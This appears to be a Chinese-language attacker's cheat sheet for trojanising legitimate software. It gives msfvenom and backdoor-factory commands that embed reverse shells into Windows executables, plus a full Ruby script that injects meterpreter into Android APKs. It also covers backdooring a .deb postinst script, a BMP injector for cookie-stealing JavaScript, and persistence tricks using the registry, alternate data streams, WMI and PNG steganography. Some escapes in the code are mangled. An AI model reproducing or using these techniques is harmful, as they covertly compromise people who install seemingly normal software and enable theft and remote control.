常见捆绑注入payload手法
Payload捆绑注入
注入exe型+编码: msfvenom -a <arch> --plateform <platform> -p <payload> <payload options> -e <encoder option> -i <encoder times> -x <template> -k <keep> -f <format> -o <path> 拼接型: msfvenom -a <arch> --platform <platform> -p <payload> -c <shellcode> <payload options> -e <encoder option> -i <encoder times> -f <format> -o <path>
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=xxx -x putty.exe -k -e x86/shikata_ga_nai -f exe > testtmp.exe
-p参数可以接收自定义载荷
cat payload_file.bin | ./msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -f raw
backdoor-factory
在指定程序中注入payload backdoor-factory -f Test.exe -S #检测是否支持注入 backdoor-factory -f Test.exe -s show #查看注入payload所需参数 backdoor-factory -f Test.exe -s .... -H <host> -P <Port> -a backdoor -i -s reverse_shell_tcp -H AttackerHost -P port -a -D #自动搜索应用程序(-i)并注入反弹payload(-a),并删除原文件(-D) -u .moocowwow #-u参数则代表把原文件改为指定拓展名的文件
User supplied shellcode
msfvenom -p windows/exec CMD='calc.exe' R > calc.bin backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin
veil-evasion
>native/backdoor_factory >set LHOST ..... >set LPORT >set orig_exe /path/要注入的后门程序 >info 查看信息 >generate 生成payload 设置名字时不要加拓展名
shellter
基本使用不再介绍,这里介绍下加载自定义payload
如使用msf先生成payload:
msf > use payload/windows/meterpreter/reverse_http msf payload(reverse_http) > show options msf payload(reverse_http) > set lhost xxx msf payload(reverse_http) > set exitfunc thread msf payload(reverse_http) > generate -E -e x86/shikata_ga_nai -t raw -f shellcode.raw
或者
msfvenom -p windows/meterpreter/reverse_http -e x86/shikata_ga_nai -i 8 -b 'x00' LHOST=xxx LPORT=xx -f raw -o shellcode.raw
然后使用shellter时Select Payload的时候选择刚刚的生成的shellcode.raw。
APK payload捆绑
(1)ruby apk-embed-payload.rb <Normal.apk> -p android/meterpreter/reverse_tcp LHOST=... LPORT=... -o /path/embed-backdoor.apk (2)d2j-apk-sign 文件名 //重新对生成的APK文件签名(d2j-apk-sign kali自带)
其他脚本
apk_binder_script.py,apk-embed-payload.rb,slpade,backdoor-apk等
APK 逆向方式手工捆绑
(1)msfvenom -p ..... payload.apk
(2)apktool d /path/payload.apk
apktool d /path/Normal_File.apk
把逆向payload中的smail/com中的文件夹复制到正常文件逆向后的smail/com文件夹中
(3)在正常逆向的apk文件中的AndroidManifest.xml搜索' LAUNCHER'
如android:targetActive="com.facebook.nodex.startup.splashscreen.NodexSplashActivity">
targetActive :程序开始的地方,根据此路径找到NodexSplashActivity.smali文件;
(4)在该文件中搜索'onCreate':
invoke-super {p0,p1}, Lcom/facebook/nodex/startup/splashscreen/AbstractNodexSplashActivity;
->onCreate(Landroid/os/Bundle;)V
在该语句下方添加一条执行payload的语句:
invoke-static {p0},Lcom/metaspolit/stage/Payload;->start(Landroid/content/Context;)V
(5)把payload AndroidManifest.xml 中 <user-permission abdroid:name="....">语句添加到正常APK对应位置
(6)重新编译APK文件: apktool b /Normal/
(7)d2j-apk-sign 文件名 #重新签名
deb安装包中添加后门程序
(1)dpkg -x xx.deb xxx #把xx.deb解包到xxx文件夹
(2)在xxx目录新建DEBIAN(必须大写)文件夹
(3)touch control postinst #在DEBIAN文件夹新建control和postinst文件
(4)nano control #写入软件包的信息,比较重要,如果有错误可能导致无法安装,所以建议直接复制原软件包中 control文件所有内容
(5)复制后门程序到解包文件夹下 /usr/bin 目录里
(6)vi postinst #这个是安装软件是执行的脚本,这个也是我们后门程序运行的关键,内容可参考如下:
#!/bin/sh sudo chmod 2775 /usr/bin/backdoor && sudo /usr/bin/backdoor & #执行后门程序,如这里backdoor sudo /usr/bin/xxx -V #安装后显示软件版本信息,这里参数可能不太一样,也可以自定义执行的参数
(7)chmod 555 postinst #postinst的执行权限为>=555且=<775
(8)dpkg-deb --build xxx/ xxx.deb #检查一遍没有问题就可以打包了
本机开始监听,软件发送到目标客户端执行。。。
windows下也有很多小工具可以实现
如“邪恶后门添加工具”
将“邪恶后门添加工具”文件夹下的xiya.dll文件复制到正常程序所在的文件夹下,接下来在“后门地址”栏中输入刚才上传的病毒木马的链接地址
最后点击“添加后面”按钮,病毒木马的链接地址就会被添加到正规软件里面了。
这样当运行这个带有“后门”的软件时,软件就会在系统后台下载并运行设置的病毒木马程序了。
payload隐藏的相关技巧
0x00 目标:维持对目标主机的控制权限
0x01 要求:尽最大程度减少在目标windows主机留下文件,降低被发现被捕获样本的概率
0x02 方法:
1、伪造文件后缀名:使用不常见的后缀名,藏于系统的某个角落
分析:最简单直接的办法,但被发现的概率也最大
2、插入正常文件
将payload保存到系统正常文件的中间或者尾部
分析:比方法1高级一些,复杂度+1,没有单独生成文件,隐蔽性+2
3、藏于注册表
将payload加密存于注册表
分析:易被监控,隐蔽性-1,但poweliks的运用使该项技术创新性+2
poweliks简介:2014年8月左右出现,XCon2015《应用层持久化攻击技术》也对此做了介绍
特点:将payload保存为非ASCII字符,无法被注册表正常读取
运行代码方式:
(1)直接执行jscript: rundll32.exe javascript:"..mshtml,RunHTMLApplication ";alert('foo');
(2)读取注册表payload并执行: HKCU\software\microsoft\windows\currentversion\run\
读取并执行: rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write("74script language=jscript>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\software\microsoft\windows\currentversion\run\")+"74/script>")
补充:一个加密jscript的网站:http://tool.lu/js/
4、ADS (供选数据流/ alternate data stream)
将payload存入正常文件的ADS中
分析:适用于长度较小的payload,常用来执行vbs、Powershell脚本,效率+1,实现难度-1
常用命令:
列出文件ADS: dir /r test.txt
写入ADS: type nc.exe > test.txt:nc.exe
触发器:该触发器是一段VB脚本,会打开一个cmd运行test.txt:1 里的脚本
echo Dim objShell:Set objShell = WScript.CreateObject("WScript.Shell"):command = "cmd /C for /f ""delims=,"" %i in
(C:\test\test.txt:1) do %i":objShell.Run command, 0:Set objShell = Nothing > test.txt:run.vbs
5、wmibackdoor
将payload存入WMI Class中,详情见drops链接:http://drops.wooyun.org/tips/8260
分析:该方法目前普及不高,检测方法也很单一,所以payload放在这里隐蔽性+3
6、Steganography
隐写术,将payload存到图片中,甚至可以伪造windows中的默认图片
分析:隐写术由来已久,但门槛很高,复杂度+1,因此检测成本也很高,隐蔽性+3
拓展名伪装:
一些容易被忽视的可执行拓展名:
.scr:屏幕保护程序的文件类型。
.pif:“Shortcut to MS-DOS Program”文件。默认隐藏,即使用户禁用隐藏默认文件名,也是默认不显示“.pif”后缀的
相关文章
http://www.tuicool.com/articles/qINzyum PNG文件中的LSB隐写
https://zhuanlan.zhihu.com/p/24054040 利用JPEG文件格式隐藏payload
https://zhuanlan.zhihu.com/p/23890809 利用PNG文件格式隐藏Payload
BMP-JS-inject
#!/usr/bin/env python2.7
#coding:utf-8
"""
eg: python BMPinjector.py -i 1.bmp "alert(document.cookie);"
参考:http://marcoramilli.blogspot.com/2013/10/hacking-through-images.html
也可以采用js混淆来绕过检查,得到和上面一样的效果
python BMPinjector.py [-i] 1.bmp "var _0x9c4c="x64x6fx63x75x6dx65x6ex74x2ex63x6fx6fx6bx69x65"; function MsgBox(_0xccb4x3){alert(eval(_0xccb4x3));} ;MsgBox(_0x9c4c);"
注意:x64x6fx63x75x6dx65x6ex74x2ex63x6fx6fx6bx69x65对应document.cookie
演示页面run.html
<html>
<head><title>Opening an image</title></head>
<body>
<img src="1.bmp">
<script src="1.bmp"></script>
</body>
</html>
"""
import os
import argparse
def injectFile(payload,fname):
f = open(fname,"r+b")
b = f.read()
f.close()
f = open(fname,"w+b")
f.write(b)
f.seek(2,0)
f.write(b'x2Fx2A')
f.close()
f = open(fname,"a+b")
f.write(b'xFFx2Ax2Fx3Dx31x3B')
f.write(payload)
f.close()
return True
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("filename",help="the bmp file name to infected")
parser.add_argument("js_payload",help="the payload to be injected. For exampe: "alert(1);" ")
args = parser.parse_args()
injectFile(args.js_payload,args.filename)
ruby apk-embed-payload.rb
#!/usr/bin/env ruby
# apk_backdoor.rb
# This script is a POC for injecting metasploit payloads on http://vinayakwadhwa.in/apk-embed-payload.rb
# arbitrary APKs.
# Authored by timwr, Jack64
# Redistributed by PFSFX
require 'nokogiri'
require 'fileutils'
require 'optparse'
# Find the activity thatapk_backdoor.rb is opened when you click the app icon
def findlauncheractivity(amanifest)
package = amanifest.xpath("//manifest").first['package']
activities = amanifest.xpath("//activity|//activity-alias")
for activity in activities
activityname = activity.attribute("name")
category = activity.search('category')
unless category
next
end
for cat in category
categoryname = cat.attribute('name')
if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN')
activityname = activityname.to_s
unless activityname.start_with?(package)
activityname = package + activityname
end
return activityname
end
end
end
end
# If XML parsing of the manifest fails, recursively search
# the smali code for the onCreate() hook and let the user
# pick the injection point
def scrapeFilesForLauncherActivity()
smali_files||=[]
Dir.glob('original/smali*/**/*.smali') do |file|
checkFile=File.read(file)
if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V")
smali_files << file
smalifile = file
activitysmali = checkFile
end
end
i=0
print "[*] Please choose from one of the following:
"
smali_files.each{|s_file|
print "[+] Hook point ",i,": ",s_file,"
"
i+=1
}
hook=-1
while (hook < 0 || hook>i)
print "
Hook: "
hook = STDIN.gets.chomp.to_i
end
i=0
smalifile=""
activitysmali=""
smali_files.each{|s_file|
if (i==hook)
checkFile=File.read(s_file)
smalifile=s_file
activitysmali = checkFile
break
end
i+=1
}
return [smalifile,activitysmali]
end
def fix_manifest()
payload_permissions=[]
#Load payload's permissions
File.open("payload/AndroidManifest.xml","r"){|file|
k=File.read(file)
payload_manifest=Nokogiri::XML(k)
permissions = payload_manifest.xpath("//manifest/uses-permission")
for permission in permissions
name=permission.attribute("name")
payload_permissions << name.to_s
end
# print "#{k}"
}
original_permissions=[]
apk_mani=''
#Load original apk's permissions
File.open("original/AndroidManifest.xml","r"){|file2|
k=File.read(file2)
apk_mani=k
original_manifest=Nokogiri::XML(k)
permissions = original_manifest.xpath("//manifest/uses-permission")
for permission in permissions
name=permission.attribute("name")
original_permissions << name.to_s
end
# print "#{k}"
}
#Get permissions that are not in original APK
add_permissions=[]
for permission in payload_permissions
if !(original_permissions.include? permission)
print "[*] Adding #{permission}
"
add_permissions << permission
end
end
inject=0
new_mani=""
#Inject permissions in original APK's manifest
for line in apk_mani.split("
")
if (line.include? "uses-permission" and inject==0)
for permission in add_permissions
new_mani << '<uses-permission android:name="'+permission+'"/>'+"
"
end
new_mani << line+"
"
inject=1
else
new_mani << line+"
"
end
end
File.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani }
end
apkfile = ARGV[0]
unless(apkfile && File.readable?(apkfile))
puts "Usage: #{$0} [target.apk] [msfvenom options]
"
puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
exit(1)
end
jarsigner = `which jarsigner`
unless(jarsigner && jarsigner.length > 0)
puts "No jarsigner"
exit(1)
end
apktool = `which apktool`
unless(apktool && apktool.length > 0)
puts "No apktool"
exit(1)
end
apk_v=`apktool`
unless(apk_v.split()[1].include?("v2."))
puts "[-] Apktool version #{apk_v} not supported, please download the latest 2. version from git.
"
exit(1)
end
begin
msfvenom_opts = ARGV[1,ARGV.length]
opts=""
msfvenom_opts.each{|x|
opts+=x
opts+=" "
}
rescue
puts "Usage: #{$0} [target.apk] [msfvenom options]
"
puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"
puts "[-] Error parsing msfvenom options. Exiting.
"
exit(1)
end
print "[*] Generating msfvenom payload..
"
res=`msfvenom -f raw #{opts} -o payload.apk 2>&1`
if res.downcase.include?("invalid" || "error")
puts res
exit(1)
end
print "[*] Signing payload..
"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey`
`rm -rf original`
`rm -rf payload`
`cp #{apkfile} original.apk`
print "[*] Decompiling orignal APK..
"
`apktool d $(pwd)/original.apk -o $(pwd)/original`
print "[*] Decompiling payload APK..
"
`apktool d $(pwd)/payload.apk -o $(pwd)/payload`
f = File.open("original/AndroidManifest.xml")
amanifest = Nokogiri::XML(f)
f.close
print "[*] Locating onCreate() hook..
"
launcheractivity = findlauncheractivity(amanifest)
smalifile = 'original/smali/' + launcheractivity.gsub(/./, "/") + '.smali'
begin
activitysmali = File.read(smalifile)
rescue Errno::ENOENT
print "[!] Unable to find correct hook automatically
"
begin
results=scrapeFilesForLauncherActivity()
smalifile=results[0]
activitysmali=results[1]
rescue
puts "[-] Error finding launcher activity. Exiting"
exit(1)
end
end
print "[*] Copying payload files..
"
FileUtils.mkdir_p('original/smali/com/metasploit/stage/')
FileUtils.cp Dir.glob('payload/smali/com/metasploit/stage/Payload*.smali'), 'original/smali/com/metasploit/stage/'
activitycreate = ';->onCreate(Landroid/os/Bundle;)V'
payloadhook = activitycreate + "
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
hookedsmali = activitysmali.gsub(activitycreate, payloadhook)
print "[*] Loading ",smalifile," and injecting payload..
"
File.open(smalifile, "w") {|file| file.puts hookedsmali }
injected_apk=apkfile.split(".")[0]
injected_apk+="_backdoored.apk"
print "[*] Poisoning the manifest with meterpreter permissions..
"
fix_manifest()
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..
"
`apktool b -o $(pwd)/#{injected_apk} $(pwd)/original`
print "[*] Signing #{injected_apk} ..
"
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`
puts "[+] Infected file #{injected_apk} ready.
"
png图片中插入payload
#!/usr/bin/env pthon
#--*--coding=utf-8--*--
#http://bobao.360.cn/learning/detail/3274.html
# python encode.py image.png image_out.png payload.dat
from PIL import Image
from sys import argv
from base64 import b64encode
i = argv[1]
o = argv[2]
with open(argv[3], 'rb') as f:
text = f.read()
img_in = Image.open(i)
img_pad = img_in.size[0] * img_in.size[1]
text = b64encode(text)
if len(text) < img_pad:
text = text + 'x00'*(img_pad - len(text))
else:
print('File is too large to embed into the image.')
quit()
text = [text[i:i+img_in.size[1]] for i in range(0, len(text), img_in.size[1])]
img_size = img_in.size
img_mode = img_in.mode
img_o = Image.new(img_mode, img_size)
for ih, tblock in zip(xrange(img_in.size[0]), text):
for iv, an in zip(xrange(img_in.size[1]), [ord(x) for x in tblock]):
x, y, z, a = img_in.getpixel((ih, iv))
pixels = (x, y, z, an)
img_o.putpixel((ih, iv), pixels)
img_o.save(o)
相关链接
http://null-byte.wonderhowto.com/how-to/embed-metasploit-payload-original-apk-file-part-2-do-manually-0167124/
http://xiao106347.blog.163.com/blog/static/215992078201401223746744/